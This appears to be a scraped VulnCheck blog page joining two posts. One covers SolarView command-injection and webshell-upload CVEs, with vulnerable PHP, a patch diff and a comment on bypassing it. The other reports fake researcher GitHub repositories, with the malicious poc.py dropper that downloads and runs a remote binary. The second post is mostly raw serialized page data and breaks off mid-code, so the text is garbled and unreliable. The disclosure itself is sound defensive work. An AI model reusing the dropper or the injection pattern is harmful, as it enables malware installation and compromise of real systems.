CVE-2023-23333 is a simple command injection affecting the `downloader.php` endpoint (specifically mishandling of user data in the `zip` case).

```php
// Excerpt from the vendor's downloader.php, as shipped
if( isset($_REQUEST['file']) ){
 $file = $_REQUEST['file'];
}
function get_extend( $filename ){
 $pos = strrpos( $filename, "." );
 return substr( $filename, $pos );
}
$ext = get_extend( $file );
switch( $ext ){
case ".csv":
 break;
case ".jpg":
case ".jpeg":
case ".JPG":
case ".JPEG":
case ".Jpeg":
case ".Jpg":
case ".gif":
case ".GIF":
case ".Gif":
 $path = "/home/www/html/images/";
 break;
case ".zip":
 $ARCH_FILE = sprintf("/home/contec/data/%s", $file);
 if( file_exists($ARCH_FILE) ){
     unlink($ARCH_FILE);
 }
 // $file comes straight from $_REQUEST and reaches system() unescaped;
 // basename() is the only transformation applied to it
 $cmd = sprintf("/usr/local/bin/data_zip.sh %s > /dev/null", basename($ARCH_FILE));
 system($cmd);
 $file = $ARCH_FILE;
 break;
}
```

The SolarView Series is also affected by [CVE-2022-44354](https://nvd.nist.gov/vuln/detail/CVE-2022-44354), a file upload vulnerability that allows an attacker to [upload](https://github.com/strik3r0x1/Vulns/blob/main/Unrestricted%20File%20Upload_%20SolarView%20Compact%204.0%2C5.0.md) a PHP webshell to the system. The CVE description says “Compact 4.0 and 5.0” are affected, but there’s a duplicate CVE ([CVE-2022-31374](https://nvd.nist.gov/vuln/detail/CVE-2022-31374)) that says Compact 6.0 is affected. Either way, we see no changes to `/Solar_Image.php` (the affected component) until version 7.0.

```diff
-     else if( $img_type < 0 || 3 < $img_type ){
+     else if( $img_type <= 0 || 3 < $img_type ){
    echo "JPEG”;
   }
   else{
-      copy( $userfile, $IMG_PATH."/".basename($userfile_name));
-      echo urldecode($userfile_name)."<BR>\n";
-      chmod( $IMG_PATH."/".basename($userfile_name), 0666 );
-      echo $MSG_SEND_OK."\n";
+      $cmd = sprintf("/usr/bin/file %s | awk '{print $2}'",$userfile );
+      $img_type = exec( $cmd);
+      if( $img_type == "GIF" || $img_type == "PNG" || $img_type == "JPG" || $img_type == "JPEG" ){
+       copy( $userfile, $IMG_PATH."/".basename($userfile_name));
+       echo urldecode($userfile_name)."<BR>\n";
+       chmod( $IMG_PATH."/".basename($userfile_name), 0666 );
+       echo $MSG_SEND_OK."\n";
+      }
```

The changes in version 7.00 are trivially bypassed by appending the webshell to a valid image.
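Review bot: the new check only inspects the magic bytes of `$userfile`, while the destination is still `$IMG_PATH."/".basename($userfile_name)` with no check on the user-supplied extension, so a file that begins with a valid GIF/PNG/JPEG header but carries PHP after it passes `if( $img_type == "GIF" || ... )` and is still written under whatever name and extension the uploader chose (the bypass the post describes). The check needs to govern the stored name, not just the content: derive the target file name server-side and force an image extension, and consider re-encoding the upload through an image library so that trailing bytes are dropped. Two smaller points on the same hunk: shelling out to `/usr/bin/file %s | awk '{print $2}'` through `exec` is fragile (it depends on the wording of `file`'s output) and unnecessary, since `exif_imagetype($userfile)` answers the same question without a subprocess; and `chmod( ..., 0666 )` makes the stored file world-writable, which is broader than a served image needs.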
SolarView version 8.00 adds `/Solar_Image.php` to the list of pages that require authentication, which at least makes this an authenticated issue now.

Both the `/Solar_Image.php` and `/downloader.php` endpoints appear to generate hits from malicious hosts on GreyNoise, meaning that they too are likely under some level of active exploitation.

![SolarView Exploitation on GreyNoise](/blog/solarview-exploitation/solarview-exploitation-greynoise.png)

Finally, it’s worth noting that these issues are not isolated to the SolarView “Compact” hardware version. The “Air” is also affected (the code is nearly identical) and, likely, the “Battery” hardware version is affected as well.

We’ve looked at a few critical CVEs that affect the SolarView series and determined that there are a few hundred internet-facing systems that remain affected by these issues. When considered in isolation, exploitation of this system is not significant. The SolarView series are all monitoring systems, so loss of view ([T0829](https://attack.mitre.org/techniques/T0829/)) is likely the worst-case scenario. However, the impact of exploitation *can* be high depending on the network the SolarView hardware is integrated into.

For instance, if the hardware is part of a solar power generation site, then the attacker may cause loss of productivity and revenue ([T0828](https://attack.mitre.org/techniques/T0828/)) by using the hardware as a network pivot to attack other ICS resources.

The fact that a number of these systems are internet facing and that the public exploits have been available long enough to get rolled into a Mirai variant is not a good situation. As always, organizations should be mindful of which systems appear in their public IP space and track public exploits for systems that they rely on.

## Sign Up

For more information on vulnerabilities exploited in the wild, register for a VulnCheck account today by loading the VulnCheck site and clicking “Log In”.

# Fake Security Researcher GitHub Repositories Deliver Malicious Implant Blog - VulnCheck

Published 2023-06-14. Press coverage of this post:

- [Attackers set up rogue GitHub repos with malware posing as zero-day exploits](https://www.arnnet.com.au/article/707650/attackers-set-up-rogue-github-repos-malware-posing-zero-day-exploits/), ARN (Syndication of CSO), 2023-06-14
- [Fake zero-day PoC exploits on GitHub push Windows, Linux malware](https://www.csoonline.com/article/3699710/attackers-set-up-rogue-github-repos-with-malware-posing-as-zero-day-exploits.html), 2023-06-14
- [Fake Github PoCs are spreading Windows and Linux malware](https://candid.technology/fake-github-pocs-windows-linux-malware/), Candid.Technology, 2023-06-14
- [Attackers set up rogue GitHub repos with malware posing as zero-day exploits](https://www.csoonline.com/article/3699710/attackers-set-up-rogue-github-repos-with-malware-posing-as-zero-day-exploits.html), 2023-06-14
- [Malicious Actors Exploit GitHub to Distribute Fake Exploits](https://www.infosecurity-magazine.com/news/github-distribute-fake-exploits/), 2023-06-14
- [Attackers set up rogue GitHub repos with malware posing as zero-day exploits](https://www.reseller.co.nz/article/707650/attackers-set-up-rogue-github-repos-malware-posing-zero-day-exploits/?fp=2&fpid=1), Reseller News (Syndication of CSO), 2023-06-14
- [Someone is posing as a fake security company to create malicious GitHub repositories](https://www.scmagazine.com/news/devops/someone-is-posing-as-a-fake-security-company-to-create-malicious-github-repositories), 2023-06-14
- [Fake Researcher Profiles Spread Malware Through GitHub Repositories as PoC Exploits](https://thehackernews.com/2023/06/fake-researcher-profiles-spread-malware.html), 2023-06-14
- [Hackers create fake GitHub profiles to deliver malware through repositories](https://therecord.media/hackers-create-fake-github-profiles), 2023-06-14
- [Cyber Security Headlines: China ESXi exploit, WooCommerce vulnerability, Lockbit ransom report](https://cisoseries.com/cyber-security-headlines-china-esxi-exploit-woocommerce-vulnerability-lockbit-ransom-report/), 2023-06-15
- [Ep 1845, Chinese threat actors reel in Barracuda appliances. Diicot: the gang formerly known as Mexals, with Romanian ties. Recent Russian cyberespionage against Ukraine and its sympathizers](https://thecyberwire.com/podcasts/daily-podcast/1845/transcript), CyberWire Daily Podcast, 2023-06-15
- [Fake IT security researchers disguise malware as proof-of-concept exploits](https://www.heise.de/news/Falsche-IT-Sicherheitsforscher-tarnen-Malware-als-Proof-of-Concept-Exploits-9188406.html), 2023-06-15
- [Watch out - a fake security researcher is pushing malware disguised as zero-day PoC](https://www.techradar.com/news/watch-out-a-fake-security-researcher-is-pushing-malware-disguised-as-zero-day-poc), MSN (Syndication of TechRadar), 2023-06-15
- [Network Security News Summary for Thursday June 15th, 2023](https://www.youtube.com/watch?v=5n-Jci6BVc4), SANS Internet Storm Center’s Daily StormCast podcast, 2023-06-15
- [Fake company created malicious GitHub repositories](https://pages.scmagazine.com/index.php/email/emailWebview?md_id=13822), SC Media DailyScan, 2023-06-15
- [Fake Security Researcher Accounts Pushing Malware Disguised as Zero-Day Exploits](https://www.securityweek.com/fake-security-researcher-accounts-pushing-malware-disguised-as-zero-day-exploits/), 2023-06-15
- [Beware of fake security researchers who deliver malware](https://siliconangle.com/2023/06/15/beware-fake-security-researchers-deliver-malware/), 2023-06-15
- [Hackers impersonate security analysts to advertise bogus zero day exploits laced with malware](https://techmonitor.ai/technology/cybersecurity/bogus-zero-day-exploits-laced-with-malware-to-scam-researchers), Tech Monitor, 2023-06-15
- [Watch out - a fake security researcher is pushing malware disguised as zero-day PoC](https://www.techradar.com/news/watch-out-a-fake-security-researcher-is-pushing-malware-disguised-as-zero-day-poc), TechRadar Pro, 2023-06-15
- [Daily Briefing V12 Issue 115](https://thecyberwire.com/newsletters/daily-briefing/12/115), 2023-06-15
- [Attackers Create Synthetic Security Researchers to Steal IP](https://www.darkreading.com/attacks-breaches/attackers-create-synthetic-security-researchers), 2023-06-16
- [Several U.S. federal departments hit by MOVEit hack](https://www.itbusiness.ca/news/breaking-news-several-u-s-federal-departments-hit-by-moveit-hack/125325), IT Business Canada, 2023-06-16
- [Several U.S. federal departments hit by MOVEit hack](https://www.itworldcanada.com/article/breaking-news-several-u-s-federal-departments-hit-by-moveit-hack/541120), 2023-06-16
- [June 16, 2023 – Beware of fake profiles on GitHub, and are you an optimist or pessimist CISO?](https://www.itworldcanada.com/article/cyber-security-today-june-16-2023-beware-of-fake-profiles-on-github-and-are-you-an-optimist-or-pessimist-ciso/541139), 2023-06-16
- [Risky Biz News: LockBit gang made $91 million from US attacks](https://riskybiznews.substack.com/p/risky-biz-news-lockbit-gang-made?utm_source=post-email-title&publication_id=852612&post_id=128597268&isFreemail=true&utm_medium=email), 2023-06-16
- [Warning: Fake GitHub Repos Delivering Malware as PoCs](https://www.hackread.com/fake-github-repos-drop-malware-pocs/), 2023-06-17
- [Guess what happened to this US agency using outdated software?](https://www.msn.com/en-us/news/technology/guess-what-happened-to-this-us-agency-using-outdated-software/ar-AA1cKmQ6?ocid=Peregrine), MSN (The Register Syndication), 2023-06-19
- [Guess what happened to this US agency that didn't patch?](https://www.theregister.com/2023/06/19/old_telerik_bug_exploited/), 2023-06-19
- [Millions Face RepoJacking Risk on GitHub Repositories](https://www.infosecurity-magazine.com/news/millions-face-repojacking-risk/), 2023-06-26
- [THIS WEEK IN SECURITY:CAMARO DRAGON, ROWPRESS, AND REPOJACKING](https://hackaday.com/2023/06/30/this-week-in-securitycamaro-dragon-rowpress-and-repojacking/), 2023-06-30
- [Fake PoC for Linux Kernel Vulnerability on GitHub Exposes Researchers to Malware](https://thehackernews.com/2023/07/blog-post.html)
- [Fake PoC on GitHub lures security researchers to download malware](https://www.scmagazine.com/news/devops/fake-poc-github-backdoor), 2023-07-14
- North Korea’s ScarCruft APT group targets infosec …
pros","https:\u002F\u002Fwww.csoonline.com\u002Farticle\u002F1296496\u002Fnorth-koreas-scarcruft-apt-group-targets-infosec-pros.html","2024-01-22",[95340],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":95342,"toc":96692},[95343,95347,95359,95368,95371,95377,95386,95389,95395,95398,95404,95410,96517,96540,96545,96551,96560,96563,96567,96611,96615,96659,96663,96689],[263,95344],{":list":95345,"ico":266,"title":95346},"[\"In early May, VulnCheck came across a malicious GitHub repository that claimed to be a Signal 0-day. The team reported the repository to GitHub, and it was quickly taken down. The same scenario continued throughout May.\",\"Recently, the individuals creating these repositories have put significant effort into making them look legitimate by creating a network of accounts and Twitter profiles, pretending to be part of a non-existent company called High Sierra Cyber Security, and even using headshots of legitimate security researchers from companies like Rapid7.\",\"Each High Sierra Cyber Security account contains a malicious repository claiming to be an exploit for a well-known product, including Chrome, Exchange, Discord, and more. Some of the accounts even advertise their “findings” on Twitter.\",\"Security researchers should understand that they are useful targets for malicious actors and should be careful when downloading code from GitHub. Always review the code you are executing, and don’t use anything you don’t understand.\"]","Fake Security Researcher GitHub Repositories Deliver Malicious Implant",[18,95348,95349,95350,95353,95354,95358],{},"As part of VulnCheck’s ",[47,95351,42306],{"href":214,"rel":95352},[51]," offering, we monitor and review large amounts of GitHub repositories. The review process exists to filter out useless, malicious, and\u002For scam repositories. 
In early May, during routine reviews, we came across an obviously malicious GitHub ",[47,95355,22188],{"href":95356,"rel":95357},"https:\u002F\u002Fgithub.com\u002Fresearchkendra91\u002Fsignal-zeroday-exploit",[51]," that claimed to be a Signal 0-day. We reported the repository to GitHub, and it was quickly taken down.",[18,95360,95361,95362,95367],{},"The very next day, an almost identical repository was created under a different account, but this time claiming to be a ",[47,95363,95366],{"href":95364,"rel":95365},"https:\u002F\u002Fgithub.com\u002Fdarthvander20\u002Fwhatsapp-zero-day-exploit\u002Fblob\u002Fmain\u002Fpoc.py",[51],"WhatsApp zero-day",". Again, we worked with GitHub to get the repository taken down. This process kept repeating itself throughout May.",[18,95369,95370],{},"More recently, however, the individual(s) creating these repositories have put more effort into making them look legitimate by creating a network of accounts. The attacker has created half a dozen GitHub accounts and a handful of associated Twitter accounts. The accounts all pretend to be part of a non-existent security company called High Sierra Cyber Security. Below is an example of one such account:",[18,95372,95373],{},[68,95374],{":width":10862,"alt":95375,"src":95376},"GSanderson","\u002Fblog\u002Ffake-repos-deliver-malicious-implant\u002Fsanderson.png",[18,95378,95379,95380,95385],{},"The profile looks like a normal security researcher account. The account has a headshot, followers, an associated organization, a Twitter handle, and a (dead) link to the company’s website. However, we recognized “Andrei Kuzman” was using a headshot of a ",[47,95381,95384],{"href":95382,"rel":95383},"https:\u002F\u002Fwww.rapid7.com\u002Fglobalassets\u002F_images\u002Fpeople\u002Fcurt-barnard1.png",[51],"Rapid7 employee",". 
So it appears the attacker is not only making efforts to make the profiles look legitimate, but also using headshots of actual security researchers.",[18,95387,95388],{},"Each High Sierra Cyber Security account contains a malicious repository claiming to be an exploit for a well-known product: Chrome, Exchange, Discord, etc. Some of the accounts even advertise their “findings” on Twitter:",[18,95390,95391],{},[68,95392],{":width":10862,"alt":95393,"src":95394},"Kuzman","\u002Fblog\u002Ffake-repos-deliver-malicious-implant\u002Fkuzman.png",[18,95396,95397],{},"The repositories all follow a very simple formula. They all look like the following image (including tagging of “hot” CVE to attract victims):",[18,95399,95400],{},[68,95401],{":width":10862,"alt":95402,"src":95403},"Repo Layout","\u002Fblog\u002Ffake-repos-deliver-malicious-implant\u002Flayout.png",[18,95405,95406,95409],{},[886,95407,95408],{},"poc.py"," contains the code to download a malicious binary, and then execute it. The python script will download a different payload depending on the victim’s host operating system. 
The above Discord “0-day” uses the following code to perform these actions:",[1354,95411,95413],{"className":11719,"code":95412,"language":11721,"meta":219,"style":219},"if __name__ == '__main__':\n    if os.name == 'nt':\n        try:\n            namezip = \"cveswindows.zip\"\n            name    = \"cveswindows\"\n            url = \"https:\u002F\u002Fgithub.com\u002FGSandersonHSCS\u002Fdiscord-0-day-fix\u002Fraw\u002Fmain\u002Fgitignore\u002Fcveswindows.zip\"\n            des = os.path.join(os.environ['TMP'], namezip)\n            if not os.path.exists(os.path.join(os.environ['TMP'], name, name + \".exe\")):\n                urllib.request.urlretrieve(url, des)\n                with open(des, 'wb') as f: f.write(urllib.request.urlopen(url).read())\n                zf = ZipFile(des, 'r')\n                zf.extractall(os.path.join(os.environ['TMP'], name))\n                zf.close()\n                pid = subprocess.Popen([os.path.join(os.environ['TMP'], name, name + \".exe\")], creationflags=0x00000008 | subprocess.CREATE_NO_WINDOW).pid\n        except:\n            pass\n    else:\n        url = \"https:\u002F\u002Fgithub.com\u002FGSandersonHSCS\u002Fdiscord-0-day-fix\u002Fraw\u002Fmain\u002Fgitignore\u002Fcveslinux.zip\"\n        namezip = \"cveslinux.zip\"\n        name    = \"cveslinux\"\n\n        des = os.path.join(\"\u002Fhome\u002F\" + os.environ[\"USERNAME\"] + \"\u002F.local\u002Fshare\", namezip)\n        if not os.path.exists(os.path.join(\"\u002Fhome\u002F\" + os.environ[\"USERNAME\"] + \"\u002F.local\u002Fshare\", name, name)):\n            urllib.request.urlretrieve(url, des)\n            with open(des, 'wb') as f: f.write(urllib.request.urlopen(url).read())\n            zf = ZipFile(des, 'r')\n            zf.extractall(os.path.join(\"\u002Fhome\u002F\" + os.environ[\"USERNAME\"] + \"\u002F.local\u002Fshare\", name))\n            zf.close()\n            st = os.stat(os.path.join(\"\u002Fhome\u002F\" + os.environ[\"USERNAME\"] + 
\"\u002F.local\u002Fshare\", name, name))\n            os.chmod(os.path.join(\"\u002Fhome\u002F\" + os.environ[\"USERNAME\"] + \"\u002F.local\u002Fshare\", name, name), st.st_mode | stat.S_IEXEC)\n            subprocess.Popen([\"\u002Fbin\u002Fbash\", \"-c\", os.path.join(\"\u002Fhome\u002F\" + os.environ[\"USERNAME\"] + \"\u002F.local\u002Fshare\", name, name)], start_new_session=True, stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)\n\n\n    main()\n",[886,95414,95415,95431,95451,95458,95472,95486,95500,95542,95607,95632,95693,95717,95761,95771,95858,95865,95870,95876,95890,95904,95918,95922,95982,96054,96077,96132,96155,96216,96226,96296,96381,96502,96506,96510],{"__ignoreMap":219},[1373,95416,95417,95419,95421,95423,95425,95427,95429],{"class":1375,"line":1376},[1373,95418,4637],{"class":4636},[1373,95420,89309],{"class":9383},[1373,95422,16406],{"class":1397},[1373,95424,4713],{"class":1387},[1373,95426,89302],{"class":1391},[1373,95428,1388],{"class":1387},[1373,95430,11747],{"class":1383},[1373,95432,95433,95435,95437,95439,95441,95443,95445,95447,95449],{"class":1375,"line":220},[1373,95434,4695],{"class":4636},[1373,95436,63565],{"class":4640},[1373,95438,59],{"class":1383},[1373,95440,30774],{"class":63570},[1373,95442,16406],{"class":1397},[1373,95444,4713],{"class":1387},[1373,95446,46421],{"class":1391},[1373,95448,1388],{"class":1387},[1373,95450,11747],{"class":1383},[1373,95452,95453,95456],{"class":1375,"line":1266},[1373,95454,95455],{"class":4636},"        try",[1373,95457,11747],{"class":1383},[1373,95459,95460,95463,95465,95467,95470],{"class":1375,"line":1852},[1373,95461,95462],{"class":4640},"            namezip ",[1373,95464,5417],{"class":1397},[1373,95466,4883],{"class":1387},[1373,95468,95469],{"class":1391},"cveswindows.zip",[1373,95471,19057],{"class":1387},[1373,95473,95474,95477,95479,95481,95484],{"class":1375,"line":4692},[1373,95475,95476],{"class":4640},"            name    
",[1373,95478,5417],{"class":1397},[1373,95480,4883],{"class":1387},[1373,95482,95483],{"class":1391},"cveswindows",[1373,95485,19057],{"class":1387},[1373,95487,95488,95491,95493,95495,95498],{"class":1375,"line":4724},[1373,95489,95490],{"class":4640},"            url ",[1373,95492,5417],{"class":1397},[1373,95494,4883],{"class":1387},[1373,95496,95497],{"class":1391},"https:\u002F\u002Fgithub.com\u002FGSandersonHSCS\u002Fdiscord-0-day-fix\u002Fraw\u002Fmain\u002Fgitignore\u002Fcveswindows.zip",[1373,95499,19057],{"class":1387},[1373,95501,95502,95505,95507,95509,95511,95513,95515,95517,95519,95522,95524,95526,95528,95530,95533,95535,95537,95540],{"class":1375,"line":4756},[1373,95503,95504],{"class":4640},"            des ",[1373,95506,5417],{"class":1397},[1373,95508,63565],{"class":4640},[1373,95510,59],{"class":1383},[1373,95512,7590],{"class":63570},[1373,95514,59],{"class":1383},[1373,95516,89372],{"class":11735},[1373,95518,1384],{"class":1383},[1373,95520,95521],{"class":11735},"os",[1373,95523,59],{"class":1383},[1373,95525,63571],{"class":63570},[1373,95527,7035],{"class":1383},[1373,95529,1388],{"class":1387},[1373,95531,95532],{"class":1391},"TMP",[1373,95534,1388],{"class":1387},[1373,95536,27625],{"class":1383},[1373,95538,95539],{"class":11735}," 
namezip",[1373,95541,11875],{"class":1383},[1373,95543,95544,95546,95548,95550,95552,95554,95556,95558,95560,95562,95564,95566,95568,95570,95572,95574,95576,95578,95580,95582,95584,95586,95588,95590,95592,95595,95597,95599,95602,95604],{"class":1375,"line":4768},[1373,95545,9793],{"class":4636},[1373,95547,78483],{"class":1397},[1373,95549,63565],{"class":4640},[1373,95551,59],{"class":1383},[1373,95553,7590],{"class":63570},[1373,95555,59],{"class":1383},[1373,95557,78745],{"class":11735},[1373,95559,1384],{"class":1383},[1373,95561,95521],{"class":11735},[1373,95563,59],{"class":1383},[1373,95565,7590],{"class":63570},[1373,95567,59],{"class":1383},[1373,95569,89372],{"class":11735},[1373,95571,1384],{"class":1383},[1373,95573,95521],{"class":11735},[1373,95575,59],{"class":1383},[1373,95577,63571],{"class":63570},[1373,95579,7035],{"class":1383},[1373,95581,1388],{"class":1387},[1373,95583,95532],{"class":1391},[1373,95585,1388],{"class":1387},[1373,95587,27625],{"class":1383},[1373,95589,46496],{"class":11735},[1373,95591,5437],{"class":1383},[1373,95593,95594],{"class":11735}," name ",[1373,95596,15448],{"class":1397},[1373,95598,4883],{"class":1387},[1373,95600,95601],{"class":1391},".exe",[1373,95603,183],{"class":1387},[1373,95605,95606],{"class":1383},")):\n",[1373,95608,95609,95612,95614,95616,95618,95621,95623,95625,95627,95630],{"class":1375,"line":4792},[1373,95610,95611],{"class":4640},"                urllib",[1373,95613,59],{"class":1383},[1373,95615,75186],{"class":63570},[1373,95617,59],{"class":1383},[1373,95619,95620],{"class":11735},"urlretrieve",[1373,95622,1384],{"class":1383},[1373,95624,7585],{"class":11735},[1373,95626,5437],{"class":1383},[1373,95628,95629],{"class":11735}," 
des",[1373,95631,11875],{"class":1383},[1373,95633,95634,95637,95640,95642,95645,95647,95649,95652,95654,95656,95658,95660,95662,95664,95666,95668,95670,95673,95675,95677,95679,95682,95684,95686,95688,95691],{"class":1375,"line":4798},[1373,95635,95636],{"class":4636},"                with",[1373,95638,95639],{"class":1379}," open",[1373,95641,1384],{"class":1383},[1373,95643,95644],{"class":11735},"des",[1373,95646,5437],{"class":1383},[1373,95648,4713],{"class":1387},[1373,95650,95651],{"class":1391},"wb",[1373,95653,1388],{"class":1387},[1373,95655,2230],{"class":1383},[1373,95657,57330],{"class":4636},[1373,95659,55750],{"class":4640},[1373,95661,4606],{"class":1383},[1373,95663,55750],{"class":4640},[1373,95665,59],{"class":1383},[1373,95667,75355],{"class":11735},[1373,95669,1384],{"class":1383},[1373,95671,95672],{"class":11735},"urllib",[1373,95674,59],{"class":1383},[1373,95676,75186],{"class":63570},[1373,95678,59],{"class":1383},[1373,95680,95681],{"class":11735},"urlopen",[1373,95683,1384],{"class":1383},[1373,95685,7585],{"class":11735},[1373,95687,27987],{"class":1383},[1373,95689,95690],{"class":11735},"read",[1373,95692,11781],{"class":1383},[1373,95694,95695,95698,95700,95703,95705,95707,95709,95711,95713,95715],{"class":1375,"line":4806},[1373,95696,95697],{"class":4640},"                zf ",[1373,95699,5417],{"class":1397},[1373,95701,95702],{"class":11735}," ZipFile",[1373,95704,1384],{"class":1383},[1373,95706,95644],{"class":11735},[1373,95708,5437],{"class":1383},[1373,95710,4713],{"class":1387},[1373,95712,11872],{"class":1391},[1373,95714,1388],{"class":1387},[1373,95716,11875],{"class":1383},[1373,95718,95719,95722,95724,95727,95729,95731,95733,95735,95737,95739,95741,95743,95745,95747,95749,95751,95753,95755,95757,95759],{"class":1375,"line":4817},[1373,95720,95721],{"class":4640},"                
zf",[1373,95723,59],{"class":1383},[1373,95725,95726],{"class":11735},"extractall",[1373,95728,1384],{"class":1383},[1373,95730,95521],{"class":11735},[1373,95732,59],{"class":1383},[1373,95734,7590],{"class":63570},[1373,95736,59],{"class":1383},[1373,95738,89372],{"class":11735},[1373,95740,1384],{"class":1383},[1373,95742,95521],{"class":11735},[1373,95744,59],{"class":1383},[1373,95746,63571],{"class":63570},[1373,95748,7035],{"class":1383},[1373,95750,1388],{"class":1387},[1373,95752,95532],{"class":1391},[1373,95754,1388],{"class":1387},[1373,95756,27625],{"class":1383},[1373,95758,46496],{"class":11735},[1373,95760,16761],{"class":1383},[1373,95762,95763,95765,95767,95769],{"class":1375,"line":4825},[1373,95764,95721],{"class":4640},[1373,95766,59],{"class":1383},[1373,95768,75402],{"class":11735},[1373,95770,27326],{"class":1383},[1373,95772,95773,95776,95778,95781,95783,95786,95788,95790,95792,95794,95796,95798,95800,95802,95804,95806,95808,95810,95812,95814,95816,95818,95820,95822,95824,95826,95828,95830,95833,95836,95838,95841,95844,95846,95848,95850,95853,95855],{"class":1375,"line":4835},[1373,95774,95775],{"class":4640},"                pid ",[1373,95777,5417],{"class":1397},[1373,95779,95780],{"class":4640}," 
subprocess",[1373,95782,59],{"class":1383},[1373,95784,95785],{"class":11735},"Popen",[1373,95787,15044],{"class":1383},[1373,95789,95521],{"class":11735},[1373,95791,59],{"class":1383},[1373,95793,7590],{"class":63570},[1373,95795,59],{"class":1383},[1373,95797,89372],{"class":11735},[1373,95799,1384],{"class":1383},[1373,95801,95521],{"class":11735},[1373,95803,59],{"class":1383},[1373,95805,63571],{"class":63570},[1373,95807,7035],{"class":1383},[1373,95809,1388],{"class":1387},[1373,95811,95532],{"class":1391},[1373,95813,1388],{"class":1387},[1373,95815,27625],{"class":1383},[1373,95817,46496],{"class":11735},[1373,95819,5437],{"class":1383},[1373,95821,95594],{"class":11735},[1373,95823,15448],{"class":1397},[1373,95825,4883],{"class":1387},[1373,95827,95601],{"class":1391},[1373,95829,183],{"class":1387},[1373,95831,95832],{"class":1383},")],",[1373,95834,95835],{"class":19096}," creationflags",[1373,95837,5417],{"class":1397},[1373,95839,95840],{"class":7293},"0x",[1373,95842,95843],{"class":5467},"00000008",[1373,95845,2233],{"class":1397},[1373,95847,95780],{"class":11735},[1373,95849,59],{"class":1383},[1373,95851,95852],{"class":37971},"CREATE_NO_WINDOW",[1373,95854,27987],{"class":1383},[1373,95856,95857],{"class":63570},"pid\n",[1373,95859,95860,95863],{"class":1375,"line":4843},[1373,95861,95862],{"class":4636},"        except",[1373,95864,11747],{"class":1383},[1373,95866,95867],{"class":1375,"line":4849},[1373,95868,95869],{"class":4636},"            pass\n",[1373,95871,95872,95874],{"class":1375,"line":4877},[1373,95873,7643],{"class":4636},[1373,95875,11747],{"class":1383},[1373,95877,95878,95881,95883,95885,95888],{"class":1375,"line":4915},[1373,95879,95880],{"class":4640},"        url 
",[1373,95882,5417],{"class":1397},[1373,95884,4883],{"class":1387},[1373,95886,95887],{"class":1391},"https:\u002F\u002Fgithub.com\u002FGSandersonHSCS\u002Fdiscord-0-day-fix\u002Fraw\u002Fmain\u002Fgitignore\u002Fcveslinux.zip",[1373,95889,19057],{"class":1387},[1373,95891,95892,95895,95897,95899,95902],{"class":1375,"line":4931},[1373,95893,95894],{"class":4640},"        namezip ",[1373,95896,5417],{"class":1397},[1373,95898,4883],{"class":1387},[1373,95900,95901],{"class":1391},"cveslinux.zip",[1373,95903,19057],{"class":1387},[1373,95905,95906,95909,95911,95913,95916],{"class":1375,"line":4947},[1373,95907,95908],{"class":4640},"        name    ",[1373,95910,5417],{"class":1397},[1373,95912,4883],{"class":1387},[1373,95914,95915],{"class":1391},"cveslinux",[1373,95917,19057],{"class":1387},[1373,95919,95920],{"class":1375,"line":4952},[1373,95921,6520],{"emptyLinePlaceholder":237},[1373,95923,95924,95927,95929,95931,95933,95935,95937,95939,95941,95943,95946,95948,95950,95952,95954,95956,95958,95960,95963,95965,95967,95969,95971,95974,95976,95978,95980],{"class":1375,"line":6776},[1373,95925,95926],{"class":4640},"        des 
",[1373,95928,5417],{"class":1397},[1373,95930,63565],{"class":4640},[1373,95932,59],{"class":1383},[1373,95934,7590],{"class":63570},[1373,95936,59],{"class":1383},[1373,95938,89372],{"class":11735},[1373,95940,1384],{"class":1383},[1373,95942,183],{"class":1387},[1373,95944,95945],{"class":1391},"\u002Fhome\u002F",[1373,95947,183],{"class":1387},[1373,95949,15478],{"class":1397},[1373,95951,63565],{"class":11735},[1373,95953,59],{"class":1383},[1373,95955,63571],{"class":63570},[1373,95957,7035],{"class":1383},[1373,95959,183],{"class":1387},[1373,95961,95962],{"class":1391},"USERNAME",[1373,95964,183],{"class":1387},[1373,95966,15050],{"class":1383},[1373,95968,15478],{"class":1397},[1373,95970,4883],{"class":1387},[1373,95972,95973],{"class":1391},"\u002F.local\u002Fshare",[1373,95975,183],{"class":1387},[1373,95977,5437],{"class":1383},[1373,95979,95539],{"class":11735},[1373,95981,11875],{"class":1383},[1373,95983,95984,95986,95988,95990,95992,95994,95996,95998,96000,96002,96004,96006,96008,96010,96012,96014,96016,96018,96020,96022,96024,96026,96028,96030,96032,96034,96036,96038,96040,96042,96044,96046,96048,96050,96052],{"class":1375,"line":6781},[1373,95985,9773],{"class":4636},[1373,95987,78483],{"class":1397},[1373,95989,63565],{"class":4640},[1373,95991,59],{"class":1383},[1373,95993,7590],{"class":63570},[1373,95995,59],{"class":1383},[1373,95997,78745],{"class":11735},[1373,95999,1384],{"class":1383},[1373,96001,95521],{"class":11735},[1373,96003,59],{"class":1383},[1373,96005,7590],{"class":63570},[1373,96007,59],{"class":1383},[1373,96009,89372],{"class":11735},[1373,96011,1384],{"class":1383},[1373,96013,183],{"class":1387},[1373,96015,95945],{"class":1391},[1373,96017,183],{"class":1387},[1373,96019,15478],{"class":1397},[1373,96021,63565],{"class":11735},[1373,96023,59],{"class":1383},[1373,96025,63571],{"class":63570},[1373,96027,7035],{"class":1383},[1373,96029,183],{"class":1387},[1373,96031,95962],{"class":1391},[1373,96033,183],{"class":1387},
[1373,96035,15050],{"class":1383},[1373,96037,15478],{"class":1397},[1373,96039,4883],{"class":1387},[1373,96041,95973],{"class":1391},[1373,96043,183],{"class":1387},[1373,96045,5437],{"class":1383},[1373,96047,46496],{"class":11735},[1373,96049,5437],{"class":1383},[1373,96051,46496],{"class":11735},[1373,96053,95606],{"class":1383},[1373,96055,96056,96059,96061,96063,96065,96067,96069,96071,96073,96075],{"class":1375,"line":7524},[1373,96057,96058],{"class":4640},"            urllib",[1373,96060,59],{"class":1383},[1373,96062,75186],{"class":63570},[1373,96064,59],{"class":1383},[1373,96066,95620],{"class":11735},[1373,96068,1384],{"class":1383},[1373,96070,7585],{"class":11735},[1373,96072,5437],{"class":1383},[1373,96074,95629],{"class":11735},[1373,96076,11875],{"class":1383},[1373,96078,96079,96082,96084,96086,96088,96090,96092,96094,96096,96098,96100,96102,96104,96106,96108,96110,96112,96114,96116,96118,96120,96122,96124,96126,96128,96130],{"class":1375,"line":7530},[1373,96080,96081],{"class":4636},"            
